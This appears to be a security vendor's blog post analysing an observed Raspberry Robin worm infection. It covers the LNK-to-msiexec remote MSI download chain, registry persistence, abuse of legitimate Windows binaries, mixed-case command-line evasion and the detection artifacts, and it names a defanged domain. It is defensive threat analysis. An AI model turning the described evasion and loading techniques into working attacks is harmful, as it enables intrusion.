Raspberry Robin1 is a recent Windows worm that is known to spread through USB drives. It is also known as QNAP worm2 as it uses compromised QNAP devices in a C2 infrastructure.
The initial access comes from a malicious LNK file, which is a Windows shortcut file, present on a USB drive that launches cmd.exe to read a second file present in the same location, with a random name, that executes msiexec.exe to download and execute a remote MSI package.
A malicious DLL file is then installed on the system via this MSI package and a Registry run key is used to achieve persistence.
This worm also abuses multiple legitimate Windows binaries3 (aka LOLBins) such as msiexec.exe, fodhelper.exe or odbcconf.exe to evade defenses.
In a real situation, we have seen a user execute the malicious LNK file related to the Raspberry Robin attack with the use of mixed case on command lines to try to evade detection from security products such Antivirus or EDR (Endpoint Detection and Response):
1. The user execute the malicious LNK file from a USB drive that execute the content of the ZxYLR.lng file. An alert is generated as this execution is typically the result of clicking a malicious link (i.e. cmd.exe launched by explorer.exe) that is often the result of a spearphishing attack. Moreover in this case, the current directory is not the system drive but a drive from a mounted device. An execution from this type of drive can also be the result of a spearphishing attack via disk image file (like ISO or IMG) containing a malicious link.
2. The ZxYLR.lng file in particular contains the msiexec.exe command used to download and execute a remote MSI package. Note that the URL contains the machine name (i.e. MACHINE) and the username (i.e. USERNAME). An alert is generated because this execution of msiexec.exe is relatively suspicious.
In this case, at the time of the attack, there was no more resolution for the domain 2yD[.]eu so we were not able to observe the next step of the attack.
We can also note the use of mixed case on command lines to try to evade detection from security products such Antivirus or EDR (Endpoint Detection and Response).
The UserAssist registry data, retrieved from the NTUSER.DAT hive of the user, is an artifact that allows to list the recent programs run by a user on a Windows system. In our case, this artifact allows us to obtain the name of the LNK file launch by the user:
Besides the mount of the USB drive, the channel Application from the Windows Event Logs allows us to highlighting the execution of a suspicious remote MSI package relative to the Raspberry Robin worm:
In our case we didn’t have the chance to observe a complete compromission as the domain allowing to download the malicious MSI package was no longer resolving.
However, we can see that the initial access phase is relatively easy to detect and can be blocked automatically. We can also note that this initial access phase is similar to the current attack based on ISO images, used as a malicious macro alternative, containing a LNK file that abuses LOLBins much like the QakBot malware.
HarfangLab is a cybersecurity software company, created in 2018 by former members of the Ministry of the Defense, major cybersecurity companies and the National Cybersecurity Agency of France (ANSSI), who have more than 25 years of experience in cyber defense.
HarfangLab was created to protect organizations' IT systems while preserving their digital integrity. To reach that goal, the company has developed a sovereign EDR (Endpoint Detection & Response) designed to protect the computers and servers of an IT system. Today, HarfangLab is the only EDR certified by the National Cybersecurity Agency of France (ANSSI).
Discover HarfangLab EDR from different angles
